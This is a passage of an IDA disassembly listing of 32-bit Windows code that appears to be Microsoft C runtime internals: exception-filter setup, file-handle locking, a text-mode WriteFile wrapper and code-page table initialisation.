lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+arg_0]
call sub_42D585
add esp, 0Ch
mov [ebp+var_28], eax
test eax, eax
jz short loc_431F8E
movzx esi, byte ptr [eax]
shl esi, 4
mov [ebp+var_20], esi
jmp short loc_431F91
; ---------------------------------------------------------------------------
loc_431F8E: ; CODE XREF: sub_431EE2+9F�j
mov esi, [ebp+var_20]
loc_431F91: ; CODE XREF: sub_431EE2+AA�j
or [ebp+var_4], 0FFFFFFFFh
call sub_431FC7
cmp [ebp+var_28], 0
loc_431F9E: ; CODE XREF: sub_431EE2+65�j
jnz short loc_431FB3
loc_431FA0: ; CODE XREF: sub_431EE2+76�j
push [ebp+arg_0]
push 0
push dword_676FE0
call dword_4371E0 ; RtlSizeHeap
mov esi, eax
loc_431FB3: ; CODE XREF: sub_431EE2:loc_431F9E�j
mov eax, esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_431EE2
; =============== S U B R O U T I N E =======================================
sub_431FC4 proc near ; DATA XREF: .text:00437764�o
mov esi, [ebp-20h]
sub_431FC4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_431FC7 proc near ; CODE XREF: sub_431EE2+B3�p
push 9
call sub_42DA80
pop ecx
retn
sub_431FC7 endp
; =============== S U B R O U T I N E =======================================
sub_431FD0 proc near ; DATA XREF: sub_432016�o
; .text:00450E70�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_431FF3
cmp dword ptr [eax+10h], 3
jnz short loc_431FF3
cmp dword ptr [eax+14h], 19930520h
jnz short loc_431FF3
jmp sub_431AFC
; ---------------------------------------------------------------------------
loc_431FF3: ; CODE XREF: sub_431FD0+D�j
; sub_431FD0+13�j ...
mov eax, dword_6769F4
test eax, eax
jz short loc_432010
push eax
call sub_434C2F
test eax, eax
pop ecx
jz short loc_432010
push esi
call dword_6769F4
jmp short loc_432012
; ---------------------------------------------------------------------------
loc_432010: ; CODE XREF: sub_431FD0+2A�j
; sub_431FD0+35�j
xor eax, eax
loc_432012: ; CODE XREF: sub_431FD0+3E�j
pop esi
retn 4
sub_431FD0 endp
; =============== S U B R O U T I N E =======================================
sub_432016 proc near ; DATA XREF: .text:0043A024�o
push offset sub_431FD0
call dword_4371DC ; SetUnhandledExceptionFilter
mov dword_6769F4, eax
retn
sub_432016 endp
; =============== S U B R O U T I N E =======================================
sub_432027 proc near ; DATA XREF: .text:0043A03C�o
push dword_6769F4
call dword_4371DC ; SetUnhandledExceptionFilter
retn
sub_432027 endp
; =============== S U B R O U T I N E =======================================
sub_432034 proc near ; CODE XREF: sub_42BDE8+11�p
; sub_42C00C+E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_433167
test eax, eax
pop ecx
jz short loc_4320BD
cmp esi, offset dword_450EC0
jnz short loc_432052
xor eax, eax
jmp short loc_43205D
; ---------------------------------------------------------------------------
loc_432052: ; CODE XREF: sub_432034+18�j
cmp esi, offset dword_450EE0
jnz short loc_4320BD
push 1
pop eax
loc_43205D: ; CODE XREF: sub_432034+1C�j
inc dword_676900
test word ptr [esi+0Ch], 10Ch
jnz short loc_4320BD
cmp dword_6769F8[eax*4], 0
push ebx
push edi
lea edi, ds:6769F8h[eax*4]
mov ebx, 1000h
jnz short loc_4320A3
push ebx
call sub_4296E8
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_4320A3
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_4320B0
; ---------------------------------------------------------------------------
loc_4320A3: ; CODE XREF: sub_432034+4D�j
; sub_432034+5A�j
mov edi, [edi]
mov [esi+18h], ebx
mov [esi+8], edi
mov [esi], edi
mov [esi+4], ebx
loc_4320B0: ; CODE XREF: sub_432034+6D�j
or word ptr [esi+0Ch], 1102h
push 1
pop eax
pop edi
pop ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4320BD: ; CODE XREF: sub_432034+10�j
; sub_432034+24�j ...
xor eax, eax
pop esi
retn
sub_432034 endp
; =============== S U B R O U T I N E =======================================
sub_4320C1 proc near ; CODE XREF: sub_42BDE8+2B�p
; sub_42C00C+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
jz short loc_4320E9
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_4320E9
push esi
call sub_42F209
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
loc_4320E9: ; CODE XREF: sub_4320C1+6�j
; sub_4320C1+10�j
pop esi
retn
sub_4320C1 endp
; =============== S U B R O U T I N E =======================================
sub_4320EB proc near ; CODE XREF: sub_4335E9:loc_433761�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
push ebx
push ebp
push esi
push edi
push 12h
or edi, 0FFFFFFFFh
call sub_42DA1F
xor ebx, ebx
pop ecx
mov [esp+18h+var_8], ebx
mov [esp+18h+var_4], ebx
mov ebp, offset dword_676EC0
loc_43210B: ; CODE XREF: sub_4320EB+BC�j
mov esi, [ebp+0]
test esi, esi
jz loc_4321AF
lea eax, [esi+480h]
loc_43211C: ; CODE XREF: sub_4320EB+8A�j
cmp esi, eax
jnb short loc_432194
test byte ptr [esi+4], 1
jnz short loc_43216A
cmp dword ptr [esi+8], 0
jnz short loc_43214F
push 11h
call sub_42DA1F
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_432147
lea eax, [esi+0Ch]
push eax
call dword_437154 ; InitializeCriticalSection
inc dword ptr [esi+8]
loc_432147: ; CODE XREF: sub_4320EB+4D�j
push 11h
call sub_42DA80
pop ecx
loc_43214F: ; CODE XREF: sub_4320EB+3F�j
lea ebx, [esi+0Ch]
push ebx
call dword_4370C8 ; RtlEnterCriticalSection
test byte ptr [esi+4], 1
jz short loc_432177
push ebx
call dword_437160 ; RtlLeaveCriticalSection
mov ebx, [esp+18h+var_8]
loc_43216A: ; CODE XREF: sub_4320EB+39�j
mov eax, [ebp+0]
add esi, 24h
add eax, 480h
jmp short loc_43211C
; ---------------------------------------------------------------------------
loc_432177: ; CODE XREF: sub_4320EB+72�j
or dword ptr [esi], 0FFFFFFFFh
mov eax, esi
sub eax, [ebp+0]
push 24h
pop ecx
cdq
idiv ecx
mov edi, eax
add edi, [esp+18h+var_4]
cmp edi, 0FFFFFFFFh
jnz short loc_4321FD
mov ebx, [esp+18h+var_8]
loc_432194: ; CODE XREF: sub_4320EB+33�j
add [esp+18h+var_4], 20h
add ebp, 4
inc ebx
cmp ebp, offset dword_676FC0
mov [esp+18h+var_8], ebx
jl loc_43210B
jmp short loc_4321FD
; ---------------------------------------------------------------------------
loc_4321AF: ; CODE XREF: sub_4320EB+25�j
mov esi, 480h
push esi
call sub_4296E8
test eax, eax
pop ecx
jz short loc_4321FD
add dword_676FC0, 20h
lea ecx, ds:676EC0h[ebx*4]
lea edx, [eax+480h]
mov [ecx], eax
loc_4321D5: ; CODE XREF: sub_4320EB+104�j
cmp eax, edx
jnb short loc_4321F1
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 24h
add edx, esi
jmp short loc_4321D5
; ---------------------------------------------------------------------------
loc_4321F1: ; CODE XREF: sub_4320EB+EC�j
shl ebx, 5
mov edi, ebx
push edi
call sub_43234B
pop ecx
loc_4321FD: ; CODE XREF: sub_4320EB+A3�j
; sub_4320EB+C2�j ...
push 12h
call sub_42DA80
pop ecx
mov eax, edi
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_4320EB endp
; =============== S U B R O U T I N E =======================================
sub_43220E proc near ; CODE XREF: sub_4335E9+1FD�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push esi
cmp ecx, dword_676FC0
push edi
jnb short loc_432271
mov eax, ecx
sar eax, 5
lea edi, ds:676EC0h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
cmp dword ptr [eax+esi], 0FFFFFFFFh
jnz short loc_432271
cmp dword_451124, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_432267
sub ecx, 0
jz short loc_43225E
dec ecx
jz short loc_432259
dec ecx
jnz short loc_432267
push ebx
push 0FFFFFFF4h
jmp short loc_432261
; ---------------------------------------------------------------------------
loc_432259: ; CODE XREF: sub_43220E+41�j
push ebx
push 0FFFFFFF5h
jmp short loc_432261
; ---------------------------------------------------------------------------
loc_43225E: ; CODE XREF: sub_43220E+3E�j
push ebx
push 0FFFFFFF6h
loc_432261: ; CODE XREF: sub_43220E+49�j
; sub_43220E+4E�j
call dword_4371D8 ; SetStdHandle
loc_432267: ; CODE XREF: sub_43220E+39�j
; sub_43220E+44�j
mov eax, [edi]
mov [eax+esi], ebx
xor eax, eax
pop ebx
jmp short loc_432287
; ---------------------------------------------------------------------------
loc_432271: ; CODE XREF: sub_43220E+C�j
; sub_43220E+2B�j
call sub_42F049
mov dword ptr [eax], 9
call sub_42F052
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_432287: ; CODE XREF: sub_43220E+61�j
pop edi
pop esi
retn
sub_43220E endp
; =============== S U B R O U T I N E =======================================
sub_43228A proc near ; CODE XREF: sub_42F12D+51�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, dword_676FC0
push edi
jnb short loc_4322F0
mov eax, ecx
sar eax, 5
lea edi, ds:676EC0h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
add eax, esi
test byte ptr [eax+4], 1
jz short loc_4322F0
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_4322F0
cmp dword_451124, 1
jnz short loc_4322E6
xor eax, eax
sub ecx, eax
jz short loc_4322DD
dec ecx
jz short loc_4322D8
dec ecx
jnz short loc_4322E6
push eax
push 0FFFFFFF4h
jmp short loc_4322E0
; ---------------------------------------------------------------------------
loc_4322D8: ; CODE XREF: sub_43228A+44�j
push eax
push 0FFFFFFF5h
jmp short loc_4322E0
; ---------------------------------------------------------------------------
loc_4322DD: ; CODE XREF: sub_43228A+41�j
push eax
push 0FFFFFFF6h
loc_4322E0: ; CODE XREF: sub_43228A+4C�j
; sub_43228A+51�j
call dword_4371D8 ; SetStdHandle
loc_4322E6: ; CODE XREF: sub_43228A+3B�j
; sub_43228A+47�j
mov eax, [edi]
or dword ptr [eax+esi], 0FFFFFFFFh
xor eax, eax
jmp short loc_432306
; ---------------------------------------------------------------------------
loc_4322F0: ; CODE XREF: sub_43228A+C�j
; sub_43228A+2D�j ...
call sub_42F049
mov dword ptr [eax], 9
call sub_42F052
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_432306: ; CODE XREF: sub_43228A+64�j
pop edi
pop esi
retn
sub_43228A endp
; =============== S U B R O U T I N E =======================================
sub_432309 proc near ; CODE XREF: sub_42F12D+7�p
; sub_42F12D+1E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_676FC0
jnb short loc_432334
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea eax, [eax+eax*8]
mov ecx, dword_676EC0[ecx*4]
test byte ptr [ecx+eax*4+4], 1
lea eax, [ecx+eax*4]
jz short loc_432334
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_432334: ; CODE XREF: sub_432309+A�j
; sub_432309+26�j
call sub_42F049
mov dword ptr [eax], 9
call sub_42F052
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
retn
sub_432309 endp
; =============== S U B R O U T I N E =======================================
sub_43234B proc near ; CODE XREF: sub_42BE29+6�p
; sub_42F0D0+2A�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
mov ecx, eax
and eax, 1Fh
sar ecx, 5
push esi
push edi
mov esi, dword_676EC0[ecx*4]
lea ebx, ds:676EC0h[ecx*4]
lea edi, [eax+eax*8]
shl edi, 2
add esi, edi
cmp dword ptr [esi+8], 0
jnz short loc_432399
push 11h
call sub_42DA1F
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_432391
lea eax, [esi+0Ch]
push eax
call dword_437154 ; InitializeCriticalSection
inc dword ptr [esi+8]
loc_432391: ; CODE XREF: sub_43234B+37�j
push 11h
call sub_42DA80
pop ecx
loc_432399: ; CODE XREF: sub_43234B+29�j
mov eax, [ebx]
lea eax, [eax+edi+0Ch]
push eax
call dword_4370C8 ; RtlEnterCriticalSection
pop edi
pop esi
pop ebx
retn
sub_43234B endp
; =============== S U B R O U T I N E =======================================
sub_4323AA proc near ; CODE XREF: sub_42BE29+80�p
; sub_42F0D0+38�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea eax, [eax+eax*8]
mov ecx, dword_676EC0[ecx*4]
lea eax, [ecx+eax*4+0Ch]
push eax
call dword_437160 ; RtlLeaveCriticalSection
retn
sub_4323AA endp
; =============== S U B R O U T I N E =======================================
sub_4323CC proc near ; CODE XREF: sub_42C312+A2�p
; sub_42DA95+95�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_676FC0
jnb short loc_432419
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_676EC0[ecx*4]
lea eax, [eax+eax*8]
test byte ptr [ecx+eax*4+4], 1
jz short loc_432419
push edi
push esi
call sub_43234B
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push esi
call sub_432431
push esi
mov edi, eax
call sub_4323AA
add esp, 14h
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_432419: ; CODE XREF: sub_4323CC+B�j
; sub_4323CC+26�j
call sub_42F049
mov dword ptr [eax], 9
call sub_42F052
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
pop esi
retn
sub_4323CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432431 proc near ; CODE XREF: sub_42BE29+22�p
; sub_42BE29+2E�p ...
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_432451
loc_43244A: ; CODE XREF: sub_432431+169�j
xor eax, eax
jmp loc_4325B7
; ---------------------------------------------------------------------------
loc_432451: ; CODE XREF: sub_432431+17�j
mov eax, [ebp+arg_0]
sar eax, 5
lea ebx, ds:676EC0h[eax*4]
mov eax, [ebp+arg_0]
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [ebx]
shl esi, 2
test byte ptr [eax+esi+4], 20h
jz short loc_432481
push 2
push edi
push [ebp+arg_0]
call sub_42F84D
add esp, 0Ch
loc_432481: ; CODE XREF: sub_432431+40�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_432550
mov eax, [ebp+arg_4]
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_43258B
loc_4324A1: ; CODE XREF: sub_432431+E4�j
lea eax, [ebp+var_414]
loc_4324A7: ; CODE XREF: sub_432431+A8�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_4324DB
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_4324C6
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_4324C6: ; CODE XREF: sub_432431+8C�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jl short loc_4324A7
loc_4324DB: ; CODE XREF: sub_432431+7F�j
mov edi, eax
lea eax, [ebp+var_414]
sub edi, eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_414]
push edi
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword_437078 ; WriteFile
test eax, eax
jz short loc_432545
mov eax, [ebp+var_C]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_432517
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jb short loc_4324A1
loc_432517: ; CODE XREF: sub_432431+D9�j
; sub_432431+11D�j
xor edi, edi
loc_432519: ; CODE XREF: sub_432431+13F�j
; sub_432431+14A�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_4325B4
cmp [ebp+arg_0], edi
jz short loc_43258B
push 5
pop esi
cmp [ebp+arg_0], esi
jnz short loc_43257D
call sub_42F049
mov dword ptr [eax], 9
call sub_42F052
mov [eax], esi
jmp short loc_432586
; ---------------------------------------------------------------------------
loc_432545: ; CODE XREF: sub_432431+CF�j
call dword_43716C ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_432517
; ---------------------------------------------------------------------------
loc_432550: ; CODE XREF: sub_432431+58�j
lea ecx, [ebp+var_C]
push edi
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call dword_437078 ; WriteFile
test eax, eax
jz short loc_432572
mov eax, [ebp+var_C]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_432519
; ---------------------------------------------------------------------------
loc_432572: ; CODE XREF: sub_432431+134�j
call dword_43716C ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_432519
; ---------------------------------------------------------------------------
loc_43257D: ; CODE XREF: sub_432431+FE�j
push [ebp+arg_0]
call sub_42EFD6
pop ecx
loc_432586: ; CODE XREF: sub_432431+112�j
; sub_432431+181�j
or eax, 0FFFFFFFFh
jmp short loc_4325B7
; ---------------------------------------------------------------------------
loc_43258B: ; CODE XREF: sub_432431+6A�j
; sub_432431+F6�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_4325A0
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_43244A
loc_4325A0: ; CODE XREF: sub_432431+161�j
call sub_42F049
mov dword ptr [eax], 1Ch
call sub_42F052
mov [eax], edi
jmp short loc_432586
; ---------------------------------------------------------------------------
loc_4325B4: ; CODE XREF: sub_432431+ED�j
sub eax, [ebp+var_10]
loc_4325B7: ; CODE XREF: sub_432431+1B�j
; sub_432431+158�j
pop edi
pop esi
pop ebx
leave
retn
sub_432431 endp
; =============== S U B R O U T I N E =======================================
sub_4325BC proc near ; CODE XREF: sub_4325ED+4�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_42C104
dec dword ptr [esi+4]
pop ecx
js short loc_4325D8
mov eax, [esi]
movzx edi, byte ptr [eax]
inc eax
mov [esi], eax
jmp short loc_4325E1
; ---------------------------------------------------------------------------
loc_4325D8: ; CODE XREF: sub_4325BC+10�j
push esi
call sub_42F312
pop ecx
mov edi, eax
loc_4325E1: ; CODE XREF: sub_4325BC+1A�j
push esi
call sub_42C156
pop ecx
mov eax, edi
pop edi
pop esi
retn
sub_4325BC endp
; =============== S U B R O U T I N E =======================================
sub_4325ED proc near ; CODE XREF: sub_42BEB4+5�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_4325BC
pop ecx
retn
sub_4325ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4325F8 proc near ; CODE XREF: sub_4329D0+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push 19h
call sub_42DA1F
push [ebp+arg_0]
call sub_4327A5 ; GetOEMCP
mov ebx, eax
pop ecx
cmp ebx, dword_676C7C
pop ecx
mov [ebp+arg_0], ebx
jnz short loc_432626
loc_43261F: ; CODE XREF: sub_4325F8+196�j
xor esi, esi
jmp loc_432796
; ---------------------------------------------------------------------------
loc_432626: ; CODE XREF: sub_4325F8+25�j
test ebx, ebx
jz loc_432784
xor edx, edx
mov eax, offset dword_453980
loc_432635: ; CODE XREF: sub_4325F8+4A�j
cmp [eax], ebx
jz short loc_4326AD
add eax, 30h
inc edx
cmp eax, offset dword_453A70
jl short loc_432635
lea eax, [ebp+var_18]
push eax
push ebx
call dword_4371D4 ; GetCPInfo
push 1
pop esi
cmp eax, esi
jnz loc_43277B
push 40h
and dword_676EA4, 0
pop ecx
xor eax, eax
mov edi, offset byte_676DA0
cmp [ebp+var_18], esi
rep stosd
stosb
mov dword_676C7C, ebx
jbe loc_432768
cmp [ebp+var_12], 0
jz loc_432743
lea ecx, [ebp+var_11]
loc_43268A: ; CODE XREF: sub_4325F8+145�j
mov dl, [ecx]
test dl, dl
jz loc_432743
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_43269B: ; CODE XREF: sub_4325F8+B3�j
cmp eax, edx
ja loc_432737
or byte_676DA1[eax], 4
inc eax
jmp short loc_43269B
; ---------------------------------------------------------------------------
loc_4326AD: ; CODE XREF: sub_4325F8+3F�j
and [ebp+var_4], 0
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_676DA0
lea esi, [edx+edx*2]
rep stosd
shl esi, 4
stosb
lea ebx, dword_453990[esi]
loc_4326CA: ; CODE XREF: sub_4325F8+10F�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_4326FD
loc_4326D1: ; CODE XREF: sub_4325F8+103�j
mov dl, [ecx+1]
test dl, dl
jz short loc_4326FD
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_4326F6
mov edx, [ebp+var_4]
mov dl, byte_453978[edx]
loc_4326EB: ; CODE XREF: sub_4325F8+FC�j
or byte_676DA1[eax], dl
inc eax
cmp eax, edi
jbe short loc_4326EB
loc_4326F6: ; CODE XREF: sub_4325F8+E8�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_4326D1
loc_4326FD: ; CODE XREF: sub_4325F8+D7�j
; sub_4325F8+DE�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_4326CA
mov eax, [ebp+arg_0]
mov dword_676C8C, 1
push eax
mov dword_676C7C, eax
call sub_4327EF
lea esi, dword_453984[esi]
mov edi, offset dword_676C80
movsd
movsd
pop ecx
mov dword_676EA4, eax
movsd
jmp short loc_432789
; ---------------------------------------------------------------------------
loc_432737: ; CODE XREF: sub_4325F8+A5�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_43268A
loc_432743: ; CODE XREF: sub_4325F8+89�j
; sub_4325F8+96�j
mov eax, esi
loc_432745: ; CODE XREF: sub_4325F8+15A�j
or byte_676DA1[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_432745
push ebx
call sub_4327EF
pop ecx
mov dword_676EA4, eax
mov dword_676C8C, esi
jmp short loc_43276F
; ---------------------------------------------------------------------------
loc_432768: ; CODE XREF: sub_4325F8+7F�j
and dword_676C8C, 0
loc_43276F: ; CODE XREF: sub_4325F8+16E�j
xor eax, eax
mov edi, offset dword_676C80
stosd
stosd
stosd
jmp short loc_432789
; ---------------------------------------------------------------------------
loc_43277B: ; CODE XREF: sub_4325F8+5C�j
cmp dword_676A00, 0
jz short loc_432793
loc_432784: ; CODE XREF: sub_4325F8+30�j
call sub_432822
loc_432789: ; CODE XREF: sub_4325F8+13D�j
; sub_4325F8+181�j
call sub_43284B
jmp loc_43261F
; ---------------------------------------------------------------------------
loc_432793: ; CODE XREF: sub_4325F8+18A�j
or esi, 0FFFFFFFFh
loc_432796: ; CODE XREF: sub_4325F8+29�j
push 19h
call sub_42DA80
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_4325F8 endp
; =============== S U B R O U T I N E =======================================
sub_4327A5 proc near ; CODE XREF: sub_4325F8+13�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_676A00, 0
cmp eax, 0FFFFFFFEh
jnz short loc_4327C5
mov dword_676A00, 1
jmp dword_4371CC
; ---------------------------------------------------------------------------
loc_4327C5: ; CODE XREF: sub_4327A5+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_4327DA
mov dword_676A00, 1
jmp dword_4371D0
; ---------------------------------------------------------------------------
loc_4327DA: ; CODE XREF: sub_4327A5+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_4327EE
mov eax, dword_676998
mov dword_676A00, 1
locret_4327EE: ; CODE XREF: sub_4327A5+38�j
retn
sub_4327A5 endp
; =============== S U B R O U T I N E =======================================
sub_4327EF proc near ; CODE XREF: sub_4325F8+124�p
; sub_4325F8+15D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_43281C
sub eax, 4
jz short loc_432816
sub eax, 0Dh
jz short loc_432810
dec eax
jz short loc_43280A
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_43280A: ; CODE XREF: sub_4327EF+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_432810: ; CODE XREF: sub_4327EF+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_432816: ; CODE XREF: sub_4327EF+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_43281C: ; CODE XREF: sub_4327EF+9�j
mov eax, 411h
retn
sub_4327EF endp
; =============== S U B R O U T I N E =======================================
sub_432822 proc near ; CODE XREF: sub_4325F8:loc_432784�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_676DA0
rep stosd
stosb
xor eax, eax
mov edi, offset dword_676C80
mov dword_676C7C, eax
mov dword_676C8C, eax
mov dword_676EA4, eax
stosd
stosd
stosd
pop edi
retn
sub_432822 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43284B proc near ; CODE XREF: sub_4325F8:loc_432789�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push dword_676C7C
call dword_4371D4 ; GetCPInfo
cmp eax, 1
jnz loc_432984
xor eax, eax
mov esi, 100h
loc_432875: ; CODE XREF: sub_43284B+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_432875
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_4328C6
push ebx
push edi
lea edx, [ebp+var_D]
loc_432894: ; CODE XREF: sub_43284B+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_4328BB
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_4328BB: ; CODE XREF: sub_43284B+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_432894
pop edi
pop ebx
loc_4328C6: ; CODE XREF: sub_43284B+42�j
push 0
lea eax, [ebp+var_514]
push dword_676EA4
push dword_676C7C
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_43340D
push 0
lea eax, [ebp+var_214]
push dword_676C7C
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push dword_676EA4
call sub_430CCF
push 0
lea eax, [ebp+var_314]
push dword_676C7C
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push dword_676EA4
call sub_430CCF
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_432941: ; CODE XREF: sub_43284B+135�j
mov dx, [ecx]
test dl, 1
jz short loc_43295F
or byte_676DA1[eax], 10h
mov dl, [ebp+eax+var_214]
loc_432957: ; CODE XREF: sub_43284B+127�j
mov byte_676CA0[eax], dl
jmp short loc_43297B
; ---------------------------------------------------------------------------
loc_43295F: ; CODE XREF: sub_43284B+FC�j
test dl, 2
jz short loc_432974
or byte_676DA1[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_432957
; ---------------------------------------------------------------------------
loc_432974: ; CODE XREF: sub_43284B+117�j
and byte_676CA0[eax], 0
loc_43297B: ; CODE XREF: sub_43284B+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_432941
jmp short loc_4329CD
; ---------------------------------------------------------------------------
loc_432984: ; CODE XREF: sub_43284B+1D�j
xor eax, eax
mov esi, 100h
loc_43298B: ; CODE XREF: sub_43284B+180�j
cmp eax, 41h
jb short loc_4329A9
cmp eax, 5Ah
ja short loc_4329A9
or byte_676DA1[eax], 10h
mov cl, al
add cl, 20h
loc_4329A1: ; CODE XREF: sub_43284B+174�j
mov byte_676CA0[eax], cl
jmp short loc_4329C8
; ---------------------------------------------------------------------------
loc_4329A9: ; CODE XREF: sub_43284B+143�j
; sub_43284B+148�j
cmp eax, 61h
jb short loc_4329C1
cmp eax, 7Ah
ja short loc_4329C1
or byte_676DA1[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_4329A1
; ---------------------------------------------------------------------------
